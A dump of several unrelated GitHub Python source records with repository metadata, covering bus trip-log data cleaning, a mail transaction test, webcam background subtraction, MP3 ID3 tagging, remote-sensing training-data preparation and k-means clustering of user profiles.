uid_to_curbreadcrumbs.groupby(\"uid\")[\"event\"].count().reset_index()\n    )\n\n    return uid_to_curbreadcrumbs\n\n\ndef prepare_triplogs(triplogs_df):\n    \"\"\"\n    transform the data into a convenient format and add extra columns to triplogs\n    \"\"\"\n    triplogs_df[\"starttime\"] = pd.to_datetime(triplogs_df[\"starttime\"])\n    triplogs_df[\"endtime\"] = pd.to_datetime(triplogs_df[\"endtime\"])\n    triplogs_df[\"starthour\"] = triplogs_df[\"starttime\"].dt.hour\n    # uid (unique id) is used to uniquely identify a record and map between the triplogs and tripdatas datasets\n    triplogs_df[\"uid\"] = triplogs_df[\"deviceid\"] + \"_\" + triplogs_df[\"logid\"]\n    return triplogs_df\n\n\ndef prepare_tripdatas(tripdatas_df):\n    \"\"\"\n    transform the data into a convenient format and add extra columns to tripdatas\n    \"\"\"\n    # uid (unique id) is used to uniquely identify a record and map between the triplogs and tripdatas datasets\n    tripdatas_df[\"uid\"] = tripdatas_df[\"deviceid\"] + \"_\" + tripdatas_df[\"logid\"]\n    tripdatas_df[\"time\"] = pd.to_datetime(tripdatas_df[\"time\"])\n\n    return tripdatas_df\n\n\n\"\"\"\nDATA CLEANING FUNCTIONS\n\"\"\"\n\n\"\"\"\nTESTS whether rows are good for study in triplogs\nEvery test takes rows from triplogs as input and returns True or False\n\"\"\"\n\n\ndef df_valid_test(df):\n    \"\"\"\n    row: row from triplogs\n    returns: bool\n    valid is a field given in the default triplogs dataset. After inspection we understand that:\n    if a row in triplogs is not valid,\n    it has at least one of the following properties:\n    1) endstatus == “not started” or endstatus == “aborted”\n    2) duration < 0\n    \"\"\"\n    return df.valid == True\n\n\ndef end_after_start_test(df):\n    return df[\"starttime\"] < df[\"endtime\"]\n\n\ndef endstatus_completed_test(df):\n    \"\"\"\n    endstatus can be aborted, completed, not started\n    some aborted trips still can be useful because it could be aborted close to the end of the trip\n    \"\"\"\n    return df[\"endstatus\"] == \"completed\"\n\n\ndef tspmode_not_normal_test(df):\n    \"\"\"\n    tspmode can be always on, always off, normal\n    normal can still be useful when inspecting segments\n    \"\"\"\n    return df[\"tspmode\"] != \"normal\"\n\n\ndef negative_duration_test(df):\n    return df[\"duration\"] > 0\n\n\ndef has_enough_breadcrumbs_test(triplogs, tripdatas_count_by_uid):\n    \"\"\"\n    return True if tripdatas has more rows corresponding to the uid of the given triplogs row than\n    the duration of the trip (in seconds) * 0.7. Because ideally we have a row in tripdatas for every second of a trip in\n    triplogs, but we consider 70% to be enough. 
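(Editor's worked\n    example, hypothetical numbers: a 600 s trip needs more than 600 * 0.7 = 420\n    matching GPS rows in tripdatas to pass this check.)\n    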
Otherwise the trip is considered not good for study\n    \"\"\"\n\n    # count number of events because an event should occur every second (GPS in particular)\n    event_count = triplogs.merge(tripdatas_count_by_uid, on=\"uid\", how=\"left\")[\"event\"]\n    return event_count > triplogs[\"duration\"] * 0.7\n\n\ndef hit_enough_stops_test(triplogs):\n    \"\"\"\n    if the bus has hit more than 70% of the stops it was expected to, the trip is considered good\n    \"\"\"\n    return triplogs[\"countstopshit\"] / triplogs[\"stops\"] > 0.7\n\n\ndef three_sigmas_cutoff(triplogs, triplogs_grouped):\n    \"\"\"\n    within one group (routename + direction) trip durations are expected to be close to each other\n    we use statistics (a 3 standard deviations cutoff) to remove trips with a very low or high duration\n    compared to others in the group\n    triplogs_grouped = {\n        (routename, direction) as index: [trip durations std]\n    }\n    return True if (mean-3*std < trip_duration < mean+3*std) else False\n    \"\"\"\n\n    means = triplogs.merge(\n        triplogs_grouped.mean().reset_index(), on=[\"routename\", \"direction\"], how=\"left\"\n    )[\"duration_y\"]\n    stds = triplogs.merge(\n        triplogs_grouped.std(ddof=0).reset_index(),\n        on=[\"routename\", \"direction\"],\n        how=\"left\",\n    )[\"duration_y\"]\n    return ((means - 3 * stds) < triplogs[\"duration\"]) & (\n        triplogs[\"duration\"] < (means + 3 * stds)\n    )\n\n\ndef tsprequest_occur_for_tspon_test(df, uid_to_curbreadcrumbs_tsprequest):\n    \"\"\"\n    if tspmode is always on, we want to make sure\n    that intersections with tsp were present on the route\n    so we check if tsp requests occurred on the route\n    \"\"\"\n    is_tsp_req_done = (\n        df.merge(uid_to_curbreadcrumbs_tsprequest, on=\"uid\", how=\"left\")[\"event\"] > 0\n    )\n    return (df[\"tspmode\"] == \"alwaysOff\") | is_tsp_req_done\n\n\n\"\"\"\nMAIN FILTRATION FUNCTION\n\"\"\"\n\n\ndef get_clean_triplogs(\n    triplogs_df, tripdatas_df, filtration_dict=defaultdict(lambda: True)\n):\n    \"\"\"\n    cleans triplogs of data considered abnormal\n\n    filtration_dict: dict with keys corresponding to the tests by which filtration is applied and values True (if apply) or False\n\n    Available keys in filtration_dict: \"row_valid_test\", \"end_after_start_test\", \"endstatus_completed_test\",\n    \"tspmode_not_normal_test\", \"negative_duration_test\", \"hit_enough_stops_test\", \"has_enough_breadcrumbs_test\",\n    \"remove_duplicates\", \"remove_tspon_no_tsprequests\", \"3_stds\"\n\n    By default all filtrations are applied\n\n    If you do not want to apply some filtration, pass False as the value for that key in the defaultdict.\n    For example:\n    my_filtration_dict = defaultdict(lambda: True)\n    my_filtration_dict['row_valid_test'] = False\n    \"\"\"\n\n    triplogs_clean = triplogs_df\n    triplogs_clean[\"is_good_for_study\"] = True\n\n    # msg is added to reason_not_good_for_study in rows where the corresponding test failed.\n    # Every msg is separated with a comma (,)\n\n    if filtration_dict[\"row_valid_test\"]:\n        # drop invalid\n        print(\"drop invalid\")\n        triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n            \"is_good_for_study\"\n        ] & df_valid_test(triplogs_clean)\n\n    if filtration_dict[\"end_after_start_test\"]:\n        # drop starttime >= endtime\n        print(\"drop starttime >= endtime\")\n        triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n            \"is_good_for_study\"\n        ] & end_after_start_test(triplogs_clean)\n\n    if filtration_dict[\"endstatus_completed_test\"]:\n        # drop endstatus not completed\n        print(\"drop endstatus not completed\")\n        triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n            \"is_good_for_study\"\n        ] & endstatus_completed_test(triplogs_clean)\n\n    if 
filtration_dict[\"tspmode_not_normal_test\"]:\n # drop normal tspmode\n print(\"drop normal tspmode\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & tspmode_not_normal_test(triplogs_clean)\n\n if filtration_dict[\"negative_duration_test\"]:\n # drop negative duration\n print(\"drop negative duration\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & negative_duration_test(triplogs_clean)\n\n if filtration_dict[\"hit_enough_stops_test\"]:\n # drop <=70% stops hit\n print(\"drop <=70% stops hit\")\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & hit_enough_stops_test(triplogs_clean)\n\n if filtration_dict[\"has_enough_breadcrumbs_test\"]:\n # drop <=70% breadcrumbs\n print(\"drop <=70% breadcrumbs\")\n tripdatas_count_by_uid = (\n tripdatas_df[tripdatas_df[\"event\"] == \"GPS\"]\n .groupby(\"uid\")[\"event\"]\n .count()\n .reset_index()\n )\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & has_enough_breadcrumbs_test(triplogs_clean, tripdatas_count_by_uid)\n\n if filtration_dict[\"remove_duplicates\"]:\n # drop duplicated rows\n print(\"drop duplicated rows\")\n cols_for_detecting_duplicaltes = list(\n set(triplogs_clean.columns) - set([\"_id\", \"uploaddate\"])\n )\n is_duplicated_row = triplogs_clean.duplicated(\n subset=cols_for_detecting_duplicaltes, keep=\"first\"\n )\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\"is_good_for_study\"] & (\n ~is_duplicated_row\n )\n\n # if after all checks we still have empty string in reason_not_good_for_study, row is good for study\n # triplogs_clean['is_good_for_study'] = triplogs_clean[\"reason_not_good_for_study\"] == \"\"\n\n if filtration_dict[\"remove_tspon_no_tsprequests\"]:\n # drop tspon no tsp requests\n print(\"drop tspon no tsp requests\")\n # msg = \", tspon but no tsp requests\"\n uid_to_curbreadcrumbs_tsprequest = get_uid_to_curbreadcrumbs_tsprequest(\n tripdatas_df\n )\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & tsprequest_occur_for_tspon_test(\n triplogs_clean, uid_to_curbreadcrumbs_tsprequest\n )\n\n if filtration_dict[\"3_stds\"]:\n # drop trips with 3*stds lower and higher of a middle trip time\n print(\"drop 3 stds anomalies\")\n groupby = [\"routename\", \"direction\"]\n triplogs_grouped = triplogs_clean[triplogs_clean[\"is_good_for_study\"]].groupby(\n groupby\n )[\"duration\"]\n triplogs_clean[\"is_good_for_study\"] = triplogs_clean[\n \"is_good_for_study\"\n ] & three_sigmas_cutoff(triplogs_clean, triplogs_grouped)\n\n return triplogs_clean\n\n\ndef get_clean_tripdatas(tripdatas_df, filtration_dict=defaultdict(lambda: True)):\n tripdatas_clean = tripdatas_df\n if filtration_dict[\"remove_duplicates\"]:\n # drop duplicated rows\n cols_for_detecting_duplicaltes = list(\n set(tripdatas_clean.columns) - set([\"_id\"])\n )\n is_duplicated_row = tripdatas_clean.duplicated(\n subset=cols_for_detecting_duplicaltes, keep=\"first\"\n )\n tripdatas_clean[\"is_good_for_study\"] = ~is_duplicated_row\n\n return tripdatas_clean\n\n\ndef get_and_clean_tripdatas_triplogs_merge(\n tripdatas_clean, triplogs_clean, filtration_dict=defaultdict(lambda: True)\n):\n merged_df = tripdatas_clean.merge(triplogs_clean, how=\"inner\", on=\"uid\")\n if filtration_dict[\"remove_routes_mismatch\"]:\n # drop trips which do not match on routes\n print(\"drop trips which do not match on routes\")\n is_mismatch = merged_df[\"routename_y\"] != 
merged_df[\"routename_x\"]\n merged_df[\"is_good_for_study\"] = ~is_mismatch\n return merged_df\n","repo_name":"morchf/new_cdf_testing","sub_path":"ClientAPI/DS/data_cleaning/data_preparation_faster.py","file_name":"data_preparation_faster.py","file_ext":"py","file_size_in_byte":10512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"27759610620","text":"mailbox.check_empty()\n\nwith frontend.signin(\"alice\"):\n to_alice = testing.mailbox.ToRecipient(\"alice@example.org\")\n to_bob = testing.mailbox.ToRecipient(\"bob@example.org\")\n\n frontend.operation(\n \"MailTransaction\",\n data={ \"mails\": [{ \"to\": [\"alice\", \"bob\"],\n \"subject\": \"MailTransaction test #1\",\n \"body\": \"This is the mail body.\\n\\nBye, bye.\" }] },\n expect={ \"message\": None })\n\n def recipients_equal(expected, actual):\n return set(expected) == set(map(str.strip, actual.split(\",\")))\n\n def check_mail1(mail):\n testing.expect.check(\"Alice von Testing \",\n mail.header(\"From\"))\n testing.expect.check([\"Alice von Testing \",\n \"Bob von Testing \"],\n mail.header(\"To\"), equal=recipients_equal)\n testing.expect.check(\"MailTransaction test #1\",\n mail.header(\"Subject\"))\n testing.expect.check([\"This is the mail body.\", \"\", \"Bye, bye.\"],\n mail.lines)\n\n check_mail1(mailbox.pop(to_alice))\n check_mail1(mailbox.pop(to_bob))\n","repo_name":"jensl/critic","sub_path":"testing/tests/001-main/004-extensions/002-tests/004-TestExtension/005-MailTransaction.py","file_name":"005-MailTransaction.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":384,"dataset":"github-code","pt":"84"} +{"seq_id":"4942839471","text":"'''\nAUTHOR: ceposerio@up.edu.ph\nDESC: a demo of background subtraction with a series of images as input\n'''\n\nimport numpy as np \nimport cv2\n\n# the higher, the better (?)\n__NUM_LEARN_FRAMES__ = 200\n__FOREGROUND_DIFF_THRESH__ = 25\n\ncap = cv2.VideoCapture(0)\n\n# gets __NUM_LEARN_FRAMES__, and its median to compute for the background.\nprint(\"Learning the background frames. 
Please wait...\")\nbackground_frames = []\nwhile len(background_frames) < __NUM_LEARN_FRAMES__:\n\tret, frame = cap.read()\n\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\tbackground_frames.append(frame)\n\nbackground_frames = np.array(background_frames)\nbackground = np.median(background_frames, axis = 0)\n\nbackgroundShow = background.clip(0,255).astype('uint8')\nprint(\"Done!\")\ncv2.imshow(\"background\", backgroundShow)\n\n# loop until 'q' is pressed.\nwhile(1):\n\tret, current_frame = cap.read()\n\tcurrent_gray_frame = cv2.cvtColor(current_frame, cv2.COLOR_BGR2GRAY)\n\n\tdiff = current_gray_frame - background\n\tdiff = np.absolute(diff)\n\tmask = diff > __FOREGROUND_DIFF_THRESH__\n\tforeground = current_frame.copy()\n\tmask2 = np.invert(mask)\n\tforeground[mask2] = [255,255,255]\n\toutput = np.concatenate((current_frame, foreground), axis=1).astype('uint8')\n\tcv2.imshow(\"Output\", output)\n\n\tkey = cv2.waitKey(10) & 0xFF\n\tif key == ord('q'): break\n\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"gordian-eggo/project_pancit_canton","sub_path":"09/ruz_gutierrez_Ex09.py","file_name":"ruz_gutierrez_Ex09.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"11905452548","text":"import mutagen\nfrom mutagen.id3 import ID3, TIT2, TPE1, TALB, TCON, TYER, TRCK, APIC, TPE2\nfrom mutagen.mp3 import MP3\nimport urllib\n\nfrom tagger.discogs import retrieve_track_number\nfrom tagger.lyrics import search_lyrics\n\ndef create_tag(filename, year, artist, album, title, genre, track_no, cover, album_artist):\n print(filename)\n if genre is None:\n genre = 'Electronic'\n audio = MP3(filename, ID3=ID3)\n audio.delete()\n if audio.tags is None:\n audio.tags = ID3()\n audio.tags.version = (2, 4, 0)\n\n # add title tag\n audio.tags.add(TIT2(encoding=3, text=title))\n\n # add artist tag\n audio.tags.add(TPE1(encoding=3, text=artist))\n\n # add album tag\n audio.tags.add(TALB(encoding=3, text=album))\n\n # add year tag\n audio.tags.add(TYER(encoding=3, text=str(year)))\n\n # add genre tag\n audio.tags.add(TCON(encoding=3, text=genre))\n\n # add album artist tag\n if album_artist is None:\n album_artist = artist\n audio.tags.add(TPE2(encoding=3, text=album_artist))\n\n # add track number tag\n if track_no is None:\n track_no = retrieve_track_number(album, artist, title)\n audio.tags.add(TRCK(encoding=3, text=str(track_no)))\n\n lyrics_text = search_lyrics(title, artist)\n if lyrics_text is not None:\n\n # Create the USLT tag with the lyrics text and language\n lyrics = mutagen.id3.USLT(encoding=3, lang=u'eng', desc=u'', text=lyrics_text)\n audio.tags.add(lyrics)\n\n response = urllib.request.urlopen(cover)\n content = response.read()\n\n audio.save()\n\n audio = MP3(filename, ID3=ID3)\n # Create an APIC frame with the image data\n apic = APIC(\n encoding=3, # 3 is for UTF-8\n mime='image/jpeg',\n type=3, # 3 is for the cover image\n desc='Cover',\n data=content\n )\n\n # Add the APIC frame to the ID3 tags\n audio.tags.add(apic)\n\n audio.save()\n\n\ndef update_cover(filename, cover):\n image_uri = cover\n\n # Download the image data\n\n response = urllib.request.urlopen(image_uri)\n content = response.read()\n\n audio = MP3(filename, ID3=ID3)\n # Create an APIC frame with the image data\n apic = APIC(\n encoding=3, # 3 is for UTF-8\n mime='image/jpeg',\n type=3, # 3 is for the cover image\n desc='Cover',\n data=content\n )\n\n # Add the APIC frame to the ID3 tags\n 
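# (Editor's note, hypothetical hardening -- not in the original: mime='image/jpeg'\n    # above assumes the cover URL serves JPEG; one could instead derive it, e.g.\n    # mime = response.info().get_content_type().)\n    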
audio.tags.add(apic)\n\n # Save the changes to the music file\n audio.save()\n","repo_name":"vonfreiren/music-data-extensions","sub_path":"tagger/tags.py","file_name":"tags.py","file_ext":"py","file_size_in_byte":2451,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"} +{"seq_id":"3171880736","text":"import numpy as np\n\nimport logging\nfrom traindata_extractor.general.common import get_reverse_dict\nfrom traindata_extractor.general.common import data_shuffle_col\nfrom traindata_extractor.general.Vividict import Vividict\nfrom traindata_extractor.general.feat_calc import feat_calc\nfrom traindata_extractor.general.common import (\n load_json,\n add_root_path,\n delete_999_row,\n delete_nan_row,\n)\n\n\"\"\"\ntemporary useless in this project\n\"\"\"\n\n\nclass TrainDataProcessor:\n my_logger = logging.getLogger(__qualname__)\n\n def __init__(\n self,\n process_dict: dict,\n aux_dic: dict,\n npy_path_list: list,\n read_order_list: list,\n ):\n \"\"\"\n Function:\n initialize TrainDataProcessor class\n Input:\n npy_path_list: a list contains the paths of npy files.\n raster_paths:a 2-layered dict contains the raster files\n as the model input.\n like this:\n {\"sensor-1\":{\"band-1\":\"band path\",\n \"band-2\":\"band path\"],\n ...}\n \"sensor-2\":{\"band-1\":\"band path\",\n \"band-2\":\"band path\",\n ...}\n }\n label_dict: a dictionary contains label of each ground-truth\n polygon, a field named \"label\" is necessary.\n bandmath_list: a 2-layered list contains the band math info,\n like this:\n [[\"addition\",0,1],\n [\"division\",2,3],...]\n read_order_list: 2d list of read order\n \"\"\"\n # set class members\n self.npy_path_list = npy_path_list\n\n img_prepro_dict = load_json(process_dict[\"img_pro_dict\"])\n shp_prepro_dict = load_json(process_dict[\"shp_reproj_dict\"])\n img_prepro_dict, shp_prepro_dict = add_root_path(\n img_prepro_dict, shp_prepro_dict\n )\n self.work_path = process_dict[\"work_path\"]\n self.label_dict = aux_dic[\"label_dict\"]\n self.raster_path_dict = img_prepro_dict\n self.command = process_dict[\"command\"]\n self.bandmath_list = self.command[\"band_math\"]\n self.feat_list = [f[1] for f in read_order_list]\n self.read_order_list = read_order_list\n self.n_files = len(self.npy_path_list)\n self.calc_symbols = {\n \"addition\": \"+\",\n \"subtraction\": \"-\",\n \"multiplication\": \"*\",\n \"division\": \"/\",\n } # zzz todo: add set_calc_symbols func();\n\n # get the reversed dict\n self.label_dict_R = get_reverse_dict(self.label_dict)\n\n # load first npy\n self.data = np.load(self.npy_path_list[0]).item()\n\n # statistic the dict in npy\n self.statistic_data()\n\n # set a default relabel dict for classification\n self.set_relabel_dict()\n\n # set a default proportion dict\n self.set_proportion_dict()\n\n # set feature dictionary using feat_list\n self.feat_dict = {}\n n = 0\n for l in self.feat_list:\n self.feat_dict[l] = n\n n += 1\n\n def set_label_dicts(self, dic: dict):\n \"\"\"\n Function:\n set self.__label_dict and label_dict_R\n if you have a new label-dictionary.\n \"\"\"\n self.label_dict = dic\n self.label_dict_R = get_reverse_dict(dic)\n self.my_logger.info(\"label dictionary updated!~\")\n\n def statistic_data(self):\n \"\"\"\n Function:\n statistic self.data, get level 1,2,3 keys in kxl list.\n and set them as class members.\n self.feat_dict is dict of feature name and feature colomn index\n in future ndarrays.\n \"\"\"\n k1l = []\n k2l = []\n k3l = []\n feat_dic = {}\n k3n = 0\n for k1 in 
self.data.keys():\n k1l.append(k1)\n for k2 in self.raster_path_dict.keys():\n k2l.append(k2)\n for k3 in self.raster_path_dict[k2].keys():\n k3l.append(k3)\n feat_dic[k3] = k3n\n k3n += 1\n self.k1_list = k1l\n self.k2_list = k2l\n self.k3_list = k3l\n # self.feat_dict = feat_dic\n n_pix = 0\n for k1 in self.data.keys():\n n_pix += len(self.data[k1][k2l[0]][k3l[0]])\n self.n_pixel = n_pix\n\n def set_relabel_dict_bylist(self, list1: list):\n \"\"\"\n Function:\n set new_label_dict by a given list $list1\n $list1 contains the labels to be set to 1\n \"\"\"\n for key in self.new_label_dict.keys():\n self.new_label_dict[key] = 0\n for items in list1:\n self.new_label_dict[items] = 1\n self.my_logger.info(\"new label dictionary is set!\")\n\n def set_relabel_dict(self, new_dic: dict = None):\n \"\"\"\n Function:\n set new_label_dict by a given dict $new_dic\n re-label means combine original class into several new classes,\n and set some new label to the combined classes.\n \"\"\"\n if new_dic is None: # default new dict, only palm is 1\n new_dic = self.label_dict_R\n for lab in new_dic.keys():\n new_dic[lab] = 0\n if lab == \"palm\":\n new_dic[lab] = 1\n self.new_label_dict = new_dic\n self.my_logger.info(\"default re-label-dict is set\")\n else:\n self.new_label_dict = new_dic\n self.my_logger.info(\"new re-label-dict is set\")\n\n def set_proportion_dict(self, new_dic: dict = None) -> (np.array, dict):\n \"\"\"\n Function:\n set proportion_dict by a given dict new_dic\n proportion_dict has the same keys as self.label_dict,\n it stores the proportion of each class when applying them\n to classifier. this will help control some class has\n too large samples that may cause unexpected training results.\n \"\"\"\n if new_dic is None: # default new dict, all proportion is 1 (no sampling)\n new_dic = self.label_dict_R\n for lab in new_dic.keys():\n new_dic[lab] = 1\n self.proportion_dict = new_dic\n self.my_logger.info(\"default proportion-dict is set\")\n else:\n self.proportion_dict = new_dic\n self.my_logger.info(\"new proportion-dict is set\")\n\n def get_feat_name(self, bm_list: list) -> str:\n \"\"\"\n get a feature name string from bandmath command list\n \"\"\"\n b1 = bm_list[1] # band 1 name\n b2 = bm_list[2] # band 2 name\n if b1.find(\"+\") or b1.find(\"-\"):\n b1 = \"(\" + b1 + \")\"\n if b2.find(\"+\") or b2.find(\"-\"):\n b2 = \"(\" + b2 + \")\"\n\n feat_str = b1 + self.calc_symbols[bm_list[0]] + b2\n return feat_str\n\n def dict_to_nparray_new(self) -> (np.ndarray, dict):\n \"\"\"\n Function:\n get nparray-like traindata from dict\n first seperate each category into a old-version-like dict,\n then adjust the category amount by a certain dict.\n Input:\n deal with only class members.\n Output:\n array: a ndarray contains all the pixels and all the features and\n all the new label numbers, like this:\n feat1 feat2 feat3 ... label\n ---------------array contains below----------------------\n xxx.xx xxx.xx xxx.xx ... 1\n xxx.xx xxx.xx xxx.xx ... 0\n xxx.xx xxx.xx xxx.xx ... 0\n xxx.xx xxx.xx xxx.xx ... 1\n xxx.xx xxx.xx xxx.xx ... 0\n\n dict: a dictionary contains feature keys and corresponding colomn\n indices.\n\n ###### NOTICE!!! 
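######\n            (Editor's worked example, hypothetical inputs -- not in the original: with\n            the bandmath entry ['addition', 'b1', 'b2'], get_feat_name() above returns\n            '(b1)+(b2)': str.find() yields -1 when the symbol is absent, which is truthy,\n            so both operands get parenthesised.)\n        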
######\n before the band math, array is transposed and all processes\n is based on the transposed array!\n \"\"\"\n\n fn = len(self.feat_list) # feature number\n pn = self.n_pixel # sample points(pixels) number\n array = np.zeros((fn + 1, pn)) # feature number + 1 label row\n array[:, :] = -999 # np.nan\n cate_dic = Vividict()\n for c in self.label_dict_R: # category\n for f in self.feat_list: # feature list\n cate_dic[c][f] = []\n cate_dic[c][\"label\"] = []\n # loop npy dic\n for k1 in self.data.keys():\n cate = self.data[k1][\"category\"]\n for ro in self.read_order_list:\n k2 = ro[0]\n k3 = ro[1]\n sam = self.data[k1][k2][k3]\n cate_dic[cate][k3] = np.hstack((cate_dic[cate][k3], sam))\n lab = np.zeros_like(sam)\n lab[:] = self.label_dict_R[cate]\n # change labels to newlabel according to newlabel_dict\n lab[:] = self.new_label_dict[cate]\n cate_dic[cate][\"label\"] = np.hstack((cate_dic[cate][\"label\"], lab))\n\n # print length of each item\n all_sam_num = 0\n for c in self.label_dict_R: # category\n for f in self.feat_list: # feature\n print(c, \":\", f, \":\", len(cate_dic[c][f]))\n all_sam_num += len(cate_dic[c][f])\n\n if all_sam_num == 0:\n self.my_logger.info(\"dict_to_nparray_new(): no traindata found!\")\n return None\n\n print(\"---resampling---\")\n array = np.array([])\n for cate1 in cate_dic.keys():\n cate_feat = np.array([])\n pp = self.proportion_dict[cate1] # proportion\n assert 0 < pp <= 1, \"proportion must be in (0,1]\"\n for feat1 in cate_dic[cate1].keys():\n if len(cate_dic[cate1][feat1]) == 0:\n continue\n if cate_feat.size > 0:\n cate_feat = np.vstack([cate_feat, cate_dic[cate1][feat1]])\n else:\n cate_feat = cate_dic[cate1][feat1]\n n_sam = len(cate_dic[cate1][feat1])\n # data shuffle and sampling\n if len(cate_dic[cate1][feat1]) == 0:\n continue\n cate_feat = data_shuffle_col(cate_feat)\n s_sam = int(n_sam * pp)\n cate_feat = cate_feat[:, 0:s_sam]\n print(\"%s : %d\", cate1, len(cate_feat[0, :]))\n if array.size > 0:\n array = np.hstack([array, cate_feat])\n else:\n array = cate_feat\n\n self.my_logger.info(\"array shuffling...\")\n array = data_shuffle_col(array)\n array = array.swapaxes(1, 0)\n\n # band math\n n_feat = len(self.feat_dict)\n if self.bandmath_list is not None: # run band math\n self.my_logger.info(\"applying band math ......\")\n for bm in self.bandmath_list: # for each band math command\n if type(bm) is list:\n self.my_logger.info(\n \"calculating \"\n + bm[0]\n + \" of bands: {} , {}\".format(bm[1], bm[2])\n )\n array = feat_calc(\n array, self.feat_dict[bm[1]], self.feat_dict[bm[2]], bm[0]\n )\n n_feat += 1\n feat_str = self.get_feat_name(bm)\n self.feat_dict[feat_str] = n_feat - 1\n else:\n self.my_logger.error(\"wrong bandmath_list format!\")\n return None, None\n else:\n self.my_logger.error(\"bandmath_list is empty!\")\n return None, None\n\n array = delete_999_row(array)\n array = delete_nan_row(array)\n self.data = array\n\n td_name = self.work_path + \"td_all_label.npy\"\n np.save(td_name, self.data)\n self.my_logger.info(\"{}\".format(self.feat_dict))\n return array, self.feat_dict\n\n def multi_dicts_to_nparray(self) -> np.ndarray:\n \"\"\"\n Function:\n get nparray-like traindata from self.npy_path_list\n Input:\n deal with only class members.\n Output:\n array: a ndarray contains all the pixels and all the features and\n all the new label numbers\n \"\"\"\n if self.n_files < 2:\n self.my_logger.info(\n \"there is only one file in list, execute single version instead\"\n )\n td_all, feat_dic0 = self.dict_to_nparray_new()\n return 
True\n\n td_all = np.array([])\n # loop each file in list\n for nf in self.npy_path_list:\n self.data = np.load(nf)\n self.statistic_data()\n td, feat_dic0 = self.dict_to_nparray_new()\n td_all = np.vstack([td_all, td])\n\n return td_all\n","repo_name":"zhougongqi/traindata_extractor","sub_path":"ground_truth/TrainDataProcessor.py","file_name":"TrainDataProcessor.py","file_ext":"py","file_size_in_byte":12898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"27882922912","text":"# -*- coding=utf-8 -*-\r\n# \r\nimport numpy as np\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn.cluster import DBSCAN\r\nimport matplotlib.pyplot as plt\r\nfrom collections import Counter\r\nimport pandas as pd\r\n\r\n# 确定最佳k-means 聚类数量\r\n# 参考\r\n# https://blog.csdn.net/qq_15738501/article/details/79036255\r\ndef find_best_k(arr):\r\n\tarr = df.values\r\n\tSSE = []\r\n\tfor k in range(1, 11):\r\n\t\testimator = KMeans(n_clusters = k)\r\n\t\testimator.fit(arr)\r\n\t\tprint(\"finish kmeans round: %d\"%k)\r\n\t\tSSE.append(estimator.inertia_)\r\n\r\n\tX = range(1, 11)\r\n\tplt.xlabel('k')\r\n\tplt.ylabel('SSE')\r\n\tplt.plot(X,SSE,'o-')\r\n\tplt.savefig('find-best-k.png', dpi=120)\r\n\tplt.show()\r\n\r\n# kmeans聚类\r\ndef cluster_kmeans(df, k):\r\n\tarr = df.values\r\n\tprint(\"start kmeans cluster... k = %d\" %k)\r\n\tkm = KMeans(n_clusters = k, random_state = 0)\r\n\tkm.fit(arr)\r\n\r\n\tprint(\"kmeans done. k = %d\" %k)\r\n\tprint_cluster_num(km.labels_)\r\n\r\n\torigin_df = pd.read_csv('./processed-data/user-profile-behavior.csv', index_col = 'user_id')\r\n\tres_df = pd.concat([origin_df, pd.Series(km.labels_, index = origin_df.index)], axis = 1)\r\n\tres_df.columns = list(origin_df.columns) + [u'cluster_type'] #重命名表头\r\n\tres_df.to_csv('./processed-data/user-profile3-behavior-cluster.csv')\r\n\tprint(\"kmeans result saved\")\r\n\r\n# 打印出各分类标签的数量,以辅助确定t-sne perpelexity参数\r\ndef print_cluster_num(label):\r\n\tc = Counter(label.flatten())\r\n\tprint(len(c.keys()))\r\n\tprint(c)\r\n\r\nif(__name__ == '__main__'):\r\n\tdf = pd.read_csv('./processed-data/user-profile3-behavior-standardized.csv', index_col = 'user_id')\r\n\tprint(\"load standardized success.\")\r\n\t# find_best_k(df)\r\n\tcluster_kmeans(df, 5)\r\n\r\n","repo_name":"Piny-Lyo/MulUBA","sub_path":"data-process/cluster/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"13994630294","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import\nfrom __future__ import unicode_literals\nimport importlib\nimport os, os.path\nfrom py_privatekonomi.utilities import common\nfrom py_privatekonomi.core.factories.account_formatter_factory import AccountFormatterFactory\nfrom py_privatekonomi.core.factories.account_parser_factory import AccountParserFactory\nfrom py_privatekonomi.core.formatters.account_formatter import AccountFormatter\nfrom py_privatekonomi.core.formatters.swedbank_formatter import SwedbankFormatter\nfrom py_privatekonomi.core.formatters.avanza_formatter import AvanzaFormatter\nfrom py_privatekonomi.core.formatters.nordnet_formatter import NordnetFormatter\nfrom py_privatekonomi.core.parsers.regex_parser import RegexParser\nfrom py_privatekonomi.core.parsers.swedbank_parser import SwedbankParser\nfrom py_privatekonomi.core.parsers.avanza_parser import AvanzaParser\nfrom py_privatekonomi.core.parsers.nordnet_parser 
